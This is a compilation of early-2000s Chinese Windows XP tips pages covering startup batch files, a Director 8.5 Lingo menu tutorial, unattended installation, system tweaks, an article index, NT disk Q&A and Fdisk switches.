3. 双击这个批处理文件进行测试，这些自启动项目将按照排定的顺序启动。但是如果其中的某个项目需要较多的时间进行初始化，那么自启动的顺序就可以被搞乱。不过不用担心，在这种情况下，你可以在那些启动慢的项目下面加入一条延时代码，例如：“ping -n 5 127.0.0.1 > nul”，这个命令可以提供5秒钟的延迟时间，通过改变“-n”后面的数字，可以得到不同的延迟时间。

4. 测试完批处理文件之后，打开“开始|所有程序|启动”文件夹，然后按住右键把这个批处理文件拖入“开始|所有程序|启动”文件夹中，在弹出的菜单中选择“创建快捷方式”。

大功告成，下次开机的时候你就可以欣赏到自己的杰作了。


制作具有Win XP 风格的菜单

《一键清理系统垃圾》

制作具有Win XP 风格的菜单

2002-03-05　　　　作者：张科技

制作具有Win XP 风格的菜单
——妙用Director 8.5的lingo脚本

    用过Windows XP 的人都知道，它的菜单突然改头换面了，那平面带阴影的样子，用“酷”这一个流行字眼来形容是再好不过了。众所周知，大型多媒体制作软件Director 8.5是开发各种多媒体的有利工具。想不想在自己的多媒体作品里也加入类似于Windows XP风格的菜单，让你的作品更酷？

    首先，我们设想一下要实现的效果：一个Windows家族的演示软件，为了让用户更快捷地选择要观看的Windows 版本，我们制作一个快捷菜单。基本操作就是当用户在舞台范围内点击鼠标右键时，淡入淡出地弹出一个快捷菜单，让用户按下鼠标左键选定要观看的内容，选定后让计算机执行相应的演示。

    其次，说明一下在制作本例时，所要用到的一些功能：本例主要是对Director 8.5中的软件的灵魂——lingo脚本的编写和一些效果的应用。ink效果主要用于阴影、菜单选择棒的一些图片特效；透明度主要实现菜单的淡入淡出效果；角色通道主要实现菜单的显示和隐藏；其中lingo主要用于控制菜单的显示、显示位置的动态调整和相应用户的操作。
好！了解了以上一些概况后，现在我们开始用Director 8.5 制作类似于Windows XP 风格的菜单！

1．按快捷键 打开舞台属性，新建一个512*342 的电影文件。

2．收集电影演员成员资料

（1） 按 打开画板，制作一个菜单（图片大小：192*196），起名为“menu”。

（2）制作一个菜单图片（我是从Win XP里截下来），再稍许做了点改变的（如图1）。然后将图片复制到剪贴板。

图1

（3）按上述方法依次单画板窗口左上角的　按钮，再新建三张图片，制作菜单的阴影（图片大小：196*200）。起名为“shadow”；菜单项选择棒（图片大小：188*19，如图2），起名为“selectbar”；背景（图片大小：随你），起名为“background”。

说明：

以上图片需要用Photoshop等图形制作处理进行处理。

（1）对于阴影图片要通过羽化效果实现。

（2）对于菜单项选择棒图片，这里的边框线为皮蛋青（#008080），框内是由下往上的皮蛋青渐变色（#9CCECE → #000000）。

图2

好！所需的演员成员已经全部到齐，哈哈，下面开始“编剧”！

3．编辑电影剧本

图3

（1）按 打开演员库，将刚才制作的图形演员拖到舞台（Stage）上进行演出。将他们排列组织好（如图 3）。

【注】按菜单条的个数重复地拖入菜单项选择棒。

（2）按 打开分镜表（Score），对分镜表里的角色进行整理和编辑。打开分镜表的效果通道开关（见图4）。

图4

（3）设置通道1和3的角色（即背景和菜单）的ink 效果为Copy，透明度为100（如图 5）。

图5

（4）设置通道2角色（即菜单阴影）的ink 效果为 Darkest，透明度为50。操作类似于上一步。

（5）设置通道4~12角色（即菜单项选择棒）的ink 效果为Transparent，透明度为0。

经过剧本编辑，舞台上的菜单角色组如图6所示。

图6

    好! 到现在为止已经完成整个工程的60% 啦！怎么样，看上去不是很爽啊？下面就要给它加入“灵魂”啦！让它能动起来！

4．撰写lingo脚本

（1）程序构思：当用户在舞台范围内点击鼠标右键时，在鼠标右键点击的位置，淡入淡出地弹出（显示）一个快捷菜单，让用户选择他要观看的内容，按下鼠标左键后选定内容，然后让计算机执行相应的演示。

（2）程序实现

    a.编写菜单控制脚本（响应范围是全局的），按 打开脚本编辑窗口，起名为“Menu Control Script”，按脚本编辑窗口右上角的　（属性）按钮，设置其脚本类型（type）为“movie”。

然后在脚本编辑窗口里写入以下脚本：

--程序初始化

on startMovie

-- 开始时菜单应为不可见,直到用户点击鼠标右键时才显示,所以先隐藏菜单

HideMenu

--初始化菜单和菜单阴影的基点(使其能显示在正确的位置)

set the regpoint of member "menu" to point(0,0)

set the regpoint of member "shadow" to point(0,0)

alert“在舞台范围内按鼠标右键观看效果！”

end startMovie

--显示菜单事件

on ShowMenu

--打开通道2至12,显示菜单和菜单选择棒(由于选择棒的透明度(blend)为0所以暂时看不到)

repeat with i=2 to 12

set the visible of sprite i to 1

end repeat

--设置菜单和阴影的位置为鼠标点击的位置(使菜单能动态跟随鼠标)

set the loc of sprite 2 to the mouseloc

set the loc of sprite 3 to the mouseloc

--菜单选择棒动态跟随菜单（以菜单的位置为基准坐标，相对地改变选择棒位置）

repeat with i=1 to 9

--96 是菜单选择棒相对于菜单水平坐标的偏移值

sprite (i+3).loch = sprite(3).loch + 96

--32 是菜单选择棒相对于菜单垂直坐标的偏移值

--19 是菜单棒的高度

sprite (i+3).locv = sprite(3).locv + 32 + (i-1)*19

end repeat

--菜单的淡入淡出效果(透明度从10渐变到100)

repeat with i=10 to 100

set the blend of sprite 3 to i

i=i+10

updateStage

end repeat

end

--隐藏菜单事件(只是将通道2至12关闭，使其不可见)

on HideMenu

repeat with i=2 to 12

set the visible of sprite i to 0

end repeat

end
b.编写菜单项选择棒行为脚本（响应范围只限于赋予本行为的角色），按窗口上角的　按钮，新建一个脚本，起名为“Show Bar Script”，设置其脚本类型（type）为“behavior”。然后在脚本编辑窗口里写入以下脚本：

--当鼠标移入当前菜单选择棒时,即用户选中某菜单项了

--让鼠标指针变成小手形状,且把菜单选择棒的透明度改成100(完全可见)

on mouseEnter

sprite (the currentSpriteNum).blend = 100

cursor 280

end mouseEnter

--当鼠标移出当前菜单选择棒时,即用户不选某菜单项了

--把鼠标指针还原成原来指针形状,且把菜单选择棒的透明度改成0(不可见)

on mouseLeave

sprite (the currentSpriteNum).blend = 0

cursor -1

end mouseLeave

--当用户在某一菜单选择棒上按下鼠标时,执行相应的操作

on mouseDown

-- 通过 the currentSpriteNum(鼠标点击的菜单选择棒的角色编号) 属性,

-- 可以让计算机知道用户选择的菜单项，进而使计算机做出相应的操作。

case (the currentSpriteNum) of

4:alert"跳转到 Windows XP 画面!"

5:alert"跳转到 Windows 2000 画面!"

6:alert"跳转到 Windows NT workstation 4.0 画面!"

7:alert"跳转到 Windows NT Sever 4.0 画面!"

8:alert"跳转到 Windows ME 画面!"

9:alert"跳转到 Windows 98 画面!"

10:alert"跳转到 Windows 95 画面!"

11:alert"跳转到 Windows CE 3.0 画面!"

12:alert"跳转到 Windows NT Embedded 画面!"

end case

end mouseDown

c.编写画面行为脚本（相应范围是当前帧），按窗口上角的　按钮，新建一个脚本，起名为“Frame Script”，设置其脚本类型（type）为“behavior”。然后在脚本编辑窗口里写入以下脚本：

on exitFrame me

go the frame

end

--当鼠标右键按下时显示菜单

on rightmousedown

ShowMenu

end

--当鼠标按下时显示菜单

on mouseup

HideMenu

end

OK! 脚本写完了！我们来做最后一步吧——“灵魂附体”！呵呵！

图 7

5．给角色植入“灵魂”

（1） 打开分镜表，单击第1帧画面的画面脚本（如图7），将“脚本列表”中的“Frame Script”脚本拖至其中。

（2）打开分镜表（已打开就可跳过此步），选择通道4~12角色（即菜单项选择棒）（如图8），将“脚本列表”中的“Show bar Script”脚本拖至其中。

图 8

    OK了！总算大功告成！是不是有些成就感啊，呵呵！快按 试一下吧！

    以上是我模仿Windows XP 的菜单做的一个演示，但是用上面的这种方法，你可以发挥你自己的想象力以及用适当的lingo脚本，制作一些其它风格的菜单和效果，比如不规则的菜单啊、让菜单项前面的小图标动起来啊什么的。

    最后，希望通过本例的制作，能使各位加深对Director 8.5的了解和应用。


自动安装Windows XP

《一键清理系统垃圾》

自动安装Windows XP

    一、全自动安装软件──安装管理器Setupmgr.exe
    这个好东东位于Windows XP安装光盘的“\support\tools\deploy.cab”压缩包中，我们只需要进入“\support\tools”文件夹把“deploy.cab”中的文件解压出来即可。

    二、创建Windows XP自动应答文件
    双击刚才解压得到的文件“Setupmgr.exe”会出现一个名为“Windows 安装管理器向导”的窗口，单击下一步，并选择“创建新的应答文件→Windows无人参予安装→Windows XP Professional(请选择相应的版本)→全自动安装→否，这个应答文件将用来从CD安装(最好选此项)→我接受许可协议(必须接受)”，接下来才是“Windows 安装管理器”的正式界面(见图)，在左边我们可以看到已经展开的三大项设置分别是“常规设置”、“网络设置”和“高级设置”，并且会要求你输入姓名、单位、产品密钥、计算机名、管理员密码等等信息，如果不输入上述信息，则无法继续下去。输入正确后再为目标计算机选择显示设置、时区设置、网络组件、工作组或域、区域设置和语言、浏览器和shell设置、安装文件夹位置等选项。当以上所有步骤完成后，会弹出一个对话框让你输入应答文件的保存位置和文件名(当然也可以默认为“unattend.txt”)，点击确定后系统会自动生成应答文件和一个批处理文件“unattend.bat”。

    三、使用自动应答文件安装Windows XP
    我们只要在DOS下输入“Winnt /u: 自动应答文件”命令就可以高枕无忧，爱干啥干啥了，以后要再重新安装Windows XP时，只要用这个命令就行了。


最新XP技巧大总结

《一键清理系统垃圾》

返回总目录 上一页 目录页

最新XP技巧大总结

一、如何使用Windows XP的ClearType反锯齿功能

    你使用的笔记本电脑安装Windows XP的话，在处理文档时，如果你留心就会发现屏幕上的文字及字型锯齿毛边，很令人心烦。那么如何解决这个问题呢？其实微软为Windwos XP设置了ClearType反锯齿功能，你只要打开这功能就可以很好解决以上问题了。

    打开ClearType功能的方法：

    (1)选择“开始/控制面板/显示”；

    (2)在“显示属性”的对话框里，选择“外观”卷标，然后点击“效果”按键，在“效果”的对话框里你就可以打开或关闭ClearType功能了。

    如果你已经在使用XP了，而且想先要看ClearType的效果，可以打开XP中的放大镜功能，然后将光标滑过一些文字，进行效果测试。

    二、如何在Windows XP中打开NetBEUI通讯协议

    NetBEUI通讯协议应该是Windows 95/98时代的产物了，如果你现在单位有的机器升级 到了Windows XP，你将会发现NetBEUI通讯协议已经在Windows XP消失了。但在一些局域网络中，由于原来网络规划的原因，必须要有NetBEUI才能存取网络中的某些或全部计算机，难道这时又要回到Windows98时代吗？这时你不必着急，NetBEUI仍放在Windows XP光盘中，只不过是没有设为预设协议，如果需要这个通讯协议的话，就必须*自己动手安装了。

    设置方法：

    (1)放入Windows XP安装光盘，到“ValueaddMsft et etbeui”目录下将Netnbf.inf复制到C:WindowsINF中；

    (2)将Nbf.sys复制到C:WindowsSystem32Drivers中；

    (3)按“开始/控制面板/网上邻居”，选择“网络连接”，在“局域连接”(就是你目前使用中的联机)上按右键，选内容；

    (4)在“常规”这一项中，选择“安装”，选“通讯协议”按“添加”，此时就可以看到“NetBEUI Protocol”这一项(此项原来是没有的)，选取NetBEUI之后，按确定就OK了。

    三、让Windows XP快速关机、重启

    Windows XP操作系统在关闭或者重新启动的时候都要保存当前设置，而且这个过程非常缓慢。其实可以设法绕过保存设置画面，快速关机或重启。

    按下“Ctrl+Alt+Del”组合键，打开“Window任务管理器”，单击“关机”命令，在弹出的菜单中按住“Ctrl”键，单击“关机”或者“重新启动”命令，这样就可以跳过保存设置画面，实现瞬间关机或重启。

    但是采用这种关机方式，系统将不会再次提示你保存文件或者关闭窗口，如果你还有未保存的文件，千万不要用这种方法。

    找到HKEY－CURRENT－USER＼Control Panel＼Desktop键，将WaitToKillAppTimeout改为：1000，即关闭程序时仅等待1秒。

    另：程序出错和系统自动关闭停止响应的程序如何实现快速关闭。

    1、将HungAppTimeout　值改为：200，表示程序出错时等待0.5秒。

    2、将AutoEndTasks 值设为：1，让系统自动关闭停止响应的程序。

    四、批量转换图像格式

    在Windows XP中，如果没有更好的转换程序的话，我们可以通过“画图”程序，把“BMP”格式的图像文件转换成“JPG”格式的图像。但这种转换效率非常低，一次只能转换一个图像文件。其实还有一个批量转换的方法。

    首先将要进行转换的BMP图像复制到“图片收藏”文件夹中，然后选中这些图像文件，单击鼠标右键，在弹出的快捷菜单中选择“发送到/邮件接受者”命令，接下来将会弹出一个“通过电子邮件发送照片”的窗口。在该窗口选择“缩小所有照片”选项，并选择图片的大小，单击“确定”按钮，接下来，Windows XP将会把这些BMP格式的图像转换成体积较小的JPG格式，并弹出一个“发送电子邮件”窗口，最后将这些JPG格式的图像附件保存下来就可以了。

    五、对文件（夹）进行加密

    在Windows XP中确实可以直接对文件（夹）进行加密，但是有一个前提：要加密的文件（夹）所在的硬盘分区是NFTS格式的。如果不是，可以进行相应转换成NFTS后，才能进行操作。

    选中需要加密的文件（夹），单击鼠标右键，选择弹出菜单中的“属性”命令，在弹出窗口中，选择“高级”按钮，打开“高级属性”对话框，选中其中的“加密内容以便保护数据”选项，“确定”并推出即可。需要注意的是，如果用上述方法对文件（夹）进行了加密，以后重新安装系统之前，最好对它进行解密（解密方法与加密相似，只是去“加密内容以便保护数据”选项）。否则系统重装后，可能造成文件（夹）不能正常打开。

    六、取消磁盘扫描前的等待时间

    使用Windows XP时，如遇到停电、死机等意外情况，重新启动计算机后，Windows XP会自动进行磁盘扫描。在进行磁盘扫描之前，系统会给出一个10秒的倒计时时间让你选择是否跳过磁盘扫描。如果不希望磁盘扫描前的倒计时的话，也可以取消掉。选择“开始/所有程序/附件/命令提示符”，在命令提示符窗口，键“CHKNTFS /T:0”命令，回车后即可将自动磁盘扫描前的倒计时时间改成0秒。

    七、Windows XP轻松瘦身

    1、删除文件备份

    进入“Windows\System32\dllcache”目录（默认为隐藏目录），里面存储着约360MB的文件，它们是Windows XP系统文件的备份。当Windows XP的系统文件被替换、删除或修改后，系统可以自动从中提取出相应的系统文件，从而保证了系统的稳定性。如果你有Windows XP安装光盘或者已经将安装文件拷贝到硬盘上，那么大可将此文件夹删除。

    注：该文件夹不能直接删除，要在命令提示符下输入“sfc.exe /purgecache”（斜线前有空格）命令进行删除。

    2、删除驱动备份

    Windows XP自带了大量的硬件驱动程序，当检测到新硬件时系统会自动的提取相应的驱动程序进行安装。其实，多数情况下我们很少改变自己的硬件配置，因此在确定自己所需要的硬件驱动程序已经全部安装的情况下，可以将驱动备份文件删除。进入“Windows\DriverCache\i386”目录，找到名为“Driver.cab”的压缩文件，删除即可。这就可以释放出约73MB的硬盘空间。如果以后安装新硬件时系统找不到驱动程序，可以从安装光盘中提取。

    3、删除不用的输入法

    在Windows XP下有几种我们基本用不着的输入法，比如日文、韩文输入法等。删除的方法是：进入“控制面板\日期、时间、语言和区域设置\区域和语言选择”，选择“语言”选项卡，将“为东亚语言安装文件”前面的钩去掉，点“确定”后依提示删除不需要的语言选项。重新启动后，到“Windows\ime”文件夹下直接删除“chtime”、“imju8_1”、“imk6_1”三个文件夹（分别对应繁体中文、日文、韩文），这样可以释放85MB的硬盘空间。

    4、清空系统临时文件

    在“\Documents and Settings\用户名\LocalSettings\Temp”目录下（默认为隐藏目录）存储的是软件安装货运行时留下的临时文件夹和废弃的文档，这样可以释放出上百兆的硬盘空间。这个方法可以经常使用。

    八、防止任务栏“假死”

    在Windows XP中出现任务栏“假死”现象比较普遍，除了可以安装微软官方的补丁解决该问题外，还可以通过关闭高级文字服务，来防止任务栏出现“假死”现象（因为启用了高级文字服务会消耗大量系统资源，还可能与某些软件发生冲突，比如手写识别、中文键盘输入等），具体方法如下：

    打开“区域和语言选项”窗口，选择“语言”选项卡，单击“详细信息”按钮，打开“文字服务和输入语言”窗口。接着，单击“语言栏”按钮，在弹出的窗口中，直接选择“关闭高级文字服务”选项，单击“确定”按钮，这时会弹出一个确认窗口，单击“是”按钮，就可以禁用高级文字服务，最后“确定”退出即可。

    九、去除多余的管理员账号

    在Windows XP中，经常会出现有多个管理员账户的情况，除了系统本身创建的“Administrator”内置管理员账户外，还有其他的管理员账户。为了保证系统更加安全，可以去掉不需要的管理员账户。

    首先要了解的是，要删除管理员账户必须是具有管理员身份的用户才能完成删除，所以要选择系统内置的“Administrator”账户登录。在出现Windows XP登录窗口的时候，在用户名中输入“Administrator”，再输入密码登录。

    提示：“Administrator”账户只有在没有其他账户除了来宾账户外存在的情况下或以安全模式登录计算机时才会出现，所以直接在用户名中输入“Administrator”登录。

    1、用户账户法

    在Windows XP中，打开“控制面板”，在经典视图中双记“用户账户”。在打开的窗口中，点击要删除的某个管理员账户名称，在出现的用户账户更改窗口中，点击“删除账户”，接着会要求你选择是否保留管理员账户的文件，点击“保留文件”按钮就可以将该管理员账户的文件保留下来，比如桌面、我的文档、收藏夹等等。点击“删除文件”按钮，下面就会出现一个删除账户的确认窗口，点击“删除账户”按钮就可以删除该管理员账户。

    提示：该技巧必须在创建了除“Administrator”账户之外的两个或以上的管理员账户后，才能实现。

    2、本地用户和组法

    在“开始\运行”中键入“lusrmgr.msc”，打开“本地用户和组”窗口，右键单击某个管理员账户，选择“删除”命令，在弹出的删除确认窗口中，点击“是”按钮，这样就完成了管理员账户的删除。

    提示：该技巧可适用于除“Administrator”账户之外只有一个或多个管理员账户的情况。

    十、使Windows XP任务栏显示当前日期

    Windows XP任务栏不仅可以显示时间，还可以显示当前日期，但如果你刚刚装上Windows XP的话，会发现任务栏仍和以前一样，只显示时间。那么怎样才能让日期显示出来呢？其实只要将任务栏宽度拖动为两行，当前日期和星期就显示出来了。不过这也并不是每次都有效，如果把当前日期设为****-**-**格式的话（例如2003-12-31），任凭你把任务栏拖多宽，也只会显示出时间和星期，而不会显示日期。这时如想让日期也显示出来，打开“控制面板”，选择“区域和语言设置”，在“区域设置”中点击“自定义”按钮，把“时间”属性页中的时间格式改为tt h:mm:ss或tt hh:mm:ss（缺省为H:mm:ss），确定之后，再看看你的任务栏，日期是不是又显示出来了？


xp系统故障

《一键清理系统垃圾》

返回总目录

xp系统故障

◎23招打造极速WINXP
◎2000XP双系统启动问题
◎在DOS下安装Win XP
◎Explorer.exe程序在系统中的作用
◎Win2k/XP注册表终极备份与恢复手册
◎Win98+Win2000+WinXP三操作系统共同使用安装实录
◎Win2000/XP下的SFC使用参数
◎Windows2000/XP启动过程详解
◎WIN XP 安装参数大揭密
◎Win XP 键盘快捷键概述
◎Win XP的三条另类操作技巧
◎WIN XP的十八般武艺
◎Win XP高级技巧与应用（二）
◎Win XP高级技巧与应用（一）
◎Win XP家庭版也用IIS
◎
◎win XP任意自动更新法
◎Win XP使用经验二则
◎Win XP无法安装DX9的解决方法
◎WIN XP系统内置的AT命令
◎Win XP远程控制时保证安全必读
◎Win XP中的网桥
◎Windows2K及WindowsXP应用技巧
◎windows 2000/XP/2003服务全集
◎Windows 2000/XP操作系统故障恢复控制台
◎Windows XP/2003系统服务详解
◎Windows XP 的 TCP/IP 和 NBT 配置参数祥解
◎windows XP 登陆破解
◎WINDOWS XP 开始→运行→命令 集锦
◎Windows XP安装问题解答精选
◎Windows XP安装中的潜在危险 必学知识
◎Windows XP传真功能详解
◎Windows XP的八大安全策略逐个细解
◎Windows XP的备份与还原之备份篇
◎Windows XP的几个使用技巧
◎你应该知道的Windows XP的小秘密
◎Windows XP防火墙后的安全共享
◎windows xp故障简单恢复技巧
◎Windows XP挂起到硬盘后的异常故障解决
◎Windows XP和2000操作系统自动关机的实现
◎Windows XP还可以这样重启
◎Ｗindows XP精彩答辩
◎Windows XP快捷键完美篇
◎Windows XP深入问答
◎Windows XP网络及文件安全技巧总结
◎Windows XP网桥功能初探
◎Windows XP系统八种启动模式详解
◎Windows XP系统在老款机器上升级
◎Windows XP应用技巧
◎Windows XP硬件优化全功略
◎Windows XP优化指南
◎Windows XP真正的超级管理员
◎
◎Windows XP中使用鼠标右键引起CPU 100%占用问题的解决
◎Windows XP中搜索隐藏文件的两种方法
◎Windows XP中鲜为人知的热键漏洞
◎Windows XP主要问题以及解决方法一览
◎Windows XP最新两条BUG曝光
◎WindowsXP不能正常关机的解决之道
◎WindowsXP使用问题解答(一)(原创)
◎WinXP“写入缓存失败”的八个常见原因
◎WinXPpro优化设置对用XP的网管有帮助
◎WinXP安装参数
◎Windows XP 常见的进程列表
◎xp的boot.ini文件内容
◎windowsXP你不可不知道的秘密哦！~
◎WinXP开机菜单含义
◎XP轻松实现免激活升级
◎{XP去除开机登陆画面!)
◎WinXP升级到SP2的问题及解决办法常见问题
◎WinXP瘦身办法
◎XP瘦身，减肥大全
◎体验Windows XP系统内置的AT命令
◎WinXP/2000操作系统自动关机的实现
◎WINXP优化精髓
◎WinXP优化之路 让WINXP和WIN98一样快
◎WINXP中系统服务的详细说明和可被禁用的服务对照表
◎WinXP中鲜为人知的28项隐藏功能
◎在Windows XP中运行DOS程序
◎WINXP终极瘦身、优化、封装全攻略
◎XP重装需要激活的问题
◎XP的常用操作及技巧！
◎XP的故障恢复控制台
◎XP如何自动登录
◎XP万能克隆全攻略
◎XP系统CS鼠标加速问题解决办法！！！
◎系统还原的启动
◎运行
◎让WinXP更苗条、性感、速度更快
◎XP中不能正常IE浏览不正常一例
◎安全删除Windows XP SP2的四种方法
◎安装和使用 Windows XP 的恢复控制台
◎常见Windows XP启动故障及解决方法
◎打开3389服务
◎当心Win XP的“自动更新”
◎防范Windows XP的安全策略
◎感受Windows XP的远程桌面连接
◎搞定Windows XP鲜为人知的漏洞
◎给XP共享文件夹加上密码锁
◎关闭WinXP的错误报告
◎活用XP安全模式
◎加快WinXP窗口显示速度
◎教你玩转注册表:XP六条未公开秘技放送
◎解除Windows XP的文件共享限制
◎解决Win 98不能访问Win XP的问题
◎解决Windows XP不能自动登录
◎五招解决WinXP启动后操作迟延的问题
◎Win XP系统搜索故障以及处理办法点点通
◎XP输入法状态条不见了
◎Windows XP搜索功能失效
◎解决XP中CPU占用率过高问题
◎禁用Windows2000/XP系统默认共享
◎禁止winxp的默认硬盘共享
◎禁止WinXP文件夹自动展开
◎快马加鞭20秒进入Windows XP操作系统
◎快速恢复Windows 2000/XP遗忘的管理员密码
◎快速启动与关闭WinXP操作系统
◎妙用网桥在Windows XP下实现共享上网
◎内置于windows xp的防火墙ICF
◎品味WinXP与众不同的文件管理
◎破解Windows XP中WPA的武器现身？
◎巧装大硬盘上XP
◎巧妙清除Windows XP任务栏的隐藏图标记录
◎取消WinXP中[我的电脑]中用户文档的显示图标
◎取消WinXP专业版中的保留的带宽
◎全面实战Windows XP防火墙
◎全面优化Windows XP(二)
◎全面优化Windows XP(一)
◎让NetBEUI协议在Windows XP重现
◎让WIN XP注册表“失忆”更简单
◎让XP的键盘说话！一个罕见的功能
◎让你的Windows XP从此变得服服帖帖
◎如何修改Windows XP 远程管理默认端口
◎如何在WinXP下使用刻录机
◎删除隐藏在Windows XP系统深处的组件
◎设定Win XP关机按钮
◎深入了解Windows XP的刻录功能(图)
◎慎用还原Wpa.dbl文件来达到使WindowsXP永远激活的目的
◎升级到Windows XP应该考虑的6个方面
◎手工恢复Windows XP的欢迎登录界面
◎双剑合璧 在Win XP下刻录音乐CD
◎双系统中安全删除XP系统
◎谈Win XP中的另一位还原专家
◎提升XP运行速度 100%
◎万能WinXP Ghost镜像制作指南
◎忘记Windows XP登录密码的解决方案
◎为Windows XP添加五笔输入法
◎五步轻松解决Windows XP互访问题
◎消除WindowsXP中的复制乱码
◎修改Windows XP设置技巧集之开关机篇
◎隐藏在WinXP中的秘密武器
◎用ERUNT自动备份Windows 2000/XP的注册表
◎用Win 2K/XP/2003的故障恢复控制台
◎用XP安装盘修复损坏的系统文件
◎用好 Win XP 自带的“克隆”功能
◎用五种设置提高Win XP系统运行速度
◎再谈在Win 2003和Win XP平台下的ADSL共享
◎在Win XP中让QQ跑得更快
◎在Windows XP中制作屏保
◎在Winows XP下稳定使用“虚拟光驱”
◎在WinXP下搜索隐藏文件的两种方法
◎在Windows XP中运行DOS程序
◎在XP上安装NetBEUI
◎
◎找回WinXP 遗忘密码全功略
◎指定Win XP中启动项目的顺序
◎制作具有Win XP 风格的菜单
◎自动安装Windows XP
◎自己定义WinXP的时间校正服务器
◎最新XP技巧大总结

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


1.把两块硬盘，在NT中格式化成一个驱动器盘符。

《一键清理系统垃圾》

返回总目录 目录页 下一页

1.把两块硬盘，在NT中格式化成一个驱动器盘符。

用RAID技术把多个HD合成一个逻辑驱动器.
管理工具->磁盘管理->磁盘分区->创建卷集,按ctr键，选定你要合并的硬盘. 详细情况，看帮助。
Use Disk Administrator to create a volum spreading multiple HDDs

2.硬盘有数据想转换为格式请问可以吗？要多少时间？
用命令
convert c:/fs: ntfs即可或用PQMAGIC可自由转换

3.如何从新制作NT4（WKS）的紧急修复盘或启动盘？
Emerency repair disk: rdisk
boot disk: winnt32 /ox

4. 我想全部设成NTFS,应如何安装? NTFS和FAT32那一个更好一些?
a.你是否已经装好了NT？如果是，可以在命令提示符下输入CONVERT命令进行转换或用PQMAGIC软件。如果还未开始，在安装过程中系统会提示你选择何种文件系统。
在NT中，我还是认为用NTFS较好。

b.当然可以，用NT光盘做三张安装盘，用磁盘启动机器，按照提示逐步安装，当提示用哪个硬盘分区安装NT时，可设定用C：盘安装，并将磁盘转换成NTFS，安装完NT后，把其余分区格式化成NTFS或转换成NTFS。我个人认为NTFS比FAT32好一点，因为NTFS的安全性比FAT32安全，而且FAT32在NT4下不支持，要NT2000才可以支持。但在磁盘空间利用方面，FAT32可以为你节约比较多的空间。 NTFS也有它的缺点，磁盘读写速度较FAT慢。

5.设备驱动产生错误
说的不清楚，估计你的nt 有的service装的有问题，看看“控制面板”“服务”中有哪些应该启动但是却没有启动的服务，象RAS，DHCP之类
如果有，删了他从新安装一下试试。还有就是你的硬件安的是不是有问题，比如网卡的驱动什么的只能慢慢根据实际情况察

6.NT4中能用大硬盘吗(我的是QT八代8.4G的)?
你可以用另一台已安装了NT的机器来分区，否则直接安装时只能分到4G一个盘。

7.NT下怎么不能找到Modem的com?
你可以装Standard Modem.还不行的话，可能你的主板是水货。ASUS TX97出过
这种状况。
NT只显示正在使用的COM,不在NT中显示不一定是NT没有识别,你把MODEM用线连在
COM上再试试.
你可以在控制面中，创建端口中，创建一个COM3用于MODEM

返回


40GB硬盘变20GB了

《一键清理系统垃圾》

40GB硬盘变20GB了

《中国电脑教育报》ssj

    前段时间帮乡下的一个学校组装了一台电脑，配置是赛扬1GHz/i810T/128MB/

    40GB/17英寸纯平显示器。过了一个多月，校长打电话来说：“我们被商家骗了，配置单上写的是40GB的硬盘，而电脑里实际装的是20GB的。”我说不可能的，当时装电脑时我在场的，装完后也经过测试的呀。校长说：“不是我自己发现的，好几个人来看过，都说是20GB的，你过来看看吧。正好电脑让他们给弄的不好使了，光驱也没了，你来帮着给弄一弄。”

    图1

    我过去打开“我的电脑”一看，果然只有C:、D:两个盘符，没有了E:、F:和光驱G:。可能是IDE驱动出了问题，从“我的电脑→ 属性 →设备管理”一看，果然如此（见图1）。

    当初装电脑时时间较紧，硬盘不是用Fdisk分的区，而是用Ghost从另一个配置一样的电脑上的硬盘克隆过来的，如果IDE驱动不对，就只有C:、D:两个盘符（不知道是不是Ghost的Bug）。

    向校长解释了半天，他似懂非懂地点了点头。不用开机箱，从BIOS设置里让他看明白了硬盘是40GB的。本来只需设置一下IDE驱动就可，他嫌电脑安装程序很乱，希望重装一下系统。我当时早就有了这种准备，在D盘上用Ghost做过一个C盘的镜像文件。于是先把他们C盘上有用的文件保存到D盘上，再重启DOS，执行Ghost，用“Local→Partition→From Image”，一会就把系统恢复过来了。


Fdisk的隐藏参数开关

《一键清理系统垃圾》

Fdisk的隐藏参数开关

  Fdisk是广为PC爱好者所熟知的磁盘分区程序，其体格小巧，功能强大，使用简便。虽然目前受到了PQMagic等无损分区软件的巨大挑战，但Fdisk仍然是许多PC用户的首选分区程序。鉴于分区操作是对磁盘结构的重新划分，具有一定的危险性，所以开发Fdisk程序的微软公司并没有将该程序的全部参数开关公布出来，于是Fdisk的功能在一定程度上受到了限制。笔者通过与微软技术人员的联系，得到了一部分关于Fdisk的未公开参数开关，在此介绍给大家，希望朋友们能更好地利用Fdisk的全部功能。

Fdisk程序的命令行格式通用语法为：Fdisk /参数开关。未公开的参数及功能说明如下：（按字母先后顺序排列）

1、Fdisk /actok

参数功能：不检查磁盘表面是否有坏扇区。

功能说明：可以不检查磁盘表面而加快分区操作。

2、Fdisk /cmbr

参数功能：重新建立指定磁盘的主引导记录。

功能说明：其操作等同于mbr参数，不同之处是可以指定磁盘。

3、Fdisk /ext

参数功能：建立扩展分区。

功能说明：在当前磁盘上建立扩展分区（用来随后建立逻辑磁盘分区）。

4、Fdisk /fprmt

参数功能：在交互模式下询问FAT16或FAT32的使用。

功能说明：不会出现是否支持大容量硬盘的询问画面，而是在每次建立一个新的分区时询问使用FAT16还是FAT32格式。

5、Fdisk /log

参数功能：建立磁盘逻辑分区。

功能说明：用 /log来建立逻辑磁盘， /log 必须和 /ext 同时使用。

6、Fdisk /logo

参数功能：使用FAT16格式建立磁盘逻辑分区。

7、Fdisk /mbp

参数功能：重新建立主磁盘的主引导记录（Master Boot Record）。

功能说明：卸载WindowsNT或Windows2000后消除在主引导记录上记载的系统启动选择；当有病毒感染主引导记录时，用来清除病毒相当有效。

8、Fdisk /pri

参数功能：建立主分区，并设定为激活形式。

功能说明：在磁盘上建立主分区，分区会自动被设定为激活形式。

9、Fdisk /prio

参数功能：使用FAT16格式建立主分区并设定为激活形式。

10、Fdisk /q

参数功能：结束Fdisk时不重新启动计算机。

功能说明：使用 /q参数将不用在改变分区表后重新启动计算机。

11、Fdisk /status

参数功能：显示当前磁盘分区状况。

功能说明：当磁盘扩展分区上没有进行逻辑分区时，扩展分区不会被显示出来。

12、Fdisk /x

参数功能：不使用LBA属性。

功能说明：使用 /x 参数将不会产生带有LBA属性的分区。有了这些参数，使用Fdisk程序会更加得心应手。不过 隐藏参数危险系数更大，需谨慎使用。


Fdisk无法读取硬盘分区

《一键清理系统垃圾》

Fdisk无法读取硬盘分区

     症状：进入DOS，输入Fdisk命令，见不到各分区数据，紧接着是字符串“error riading fixed disk”并回到DOS提示符。

